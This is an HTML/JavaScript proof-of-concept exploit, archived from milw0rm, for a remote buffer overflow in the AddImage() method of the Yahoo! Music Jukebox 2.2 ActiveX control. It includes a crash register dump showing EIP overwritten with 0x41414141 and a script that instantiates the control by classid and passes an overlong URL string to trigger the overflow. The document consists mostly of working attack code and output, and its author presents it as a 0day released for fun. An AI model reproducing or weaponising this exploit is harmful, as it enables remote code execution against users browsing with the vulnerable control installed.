47 lines
No EOL
1.5 KiB
HTML
47 lines
No EOL
1.5 KiB
HTML
<!--
|
|
Yahoo! Music Jukebox 2.2 AddImage() ActiveX 0day Remote Buffer Overlow PoC Exploit
|
|
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
|
|
Product homepage: http://music.yahoo.com/jukebox/
|
|
Tested on:..
|
|
- Yahoo! Music Jukebox (2.2.2.056)
|
|
- MS IE 6
|
|
|
|
Details:..
|
|
|
|
----------------------------------------------------------------
|
|
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
|
|
----------------------------------------------------------------
|
|
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
|
|
ESP=03EC1370: BF 37 90 7C 58 14 EC 03-9C FF FB 03 74 14 EC 03
|
|
EBP=03EC1390: 40 14 EC 03 8B 37 90 7C-58 14 EC 03 9C FF FB 03
|
|
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
|
|
--> N/A
|
|
|
|
Just for fun ;]
|
|
-->
|
|
|
|
<object id="obj" classid="clsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C"></object>
|
|
|
|
<script>
|
|
|
|
function makebuf(payload, len) {
|
|
while(payload.length < (len * 2)) payload += payload;
|
|
payload = payload.substring(0, len);
|
|
return payload;
|
|
}
|
|
|
|
var target = "AddImage";
|
|
var payload = unescape("%u4141%u4141");
|
|
var len = 340
|
|
|
|
var tmp = makebuf(payload, len);
|
|
obj[target]('http://'+tmp, 1);
|
|
|
|
</script>
|
|
|
|
# milw0rm.com [2008-02-02] |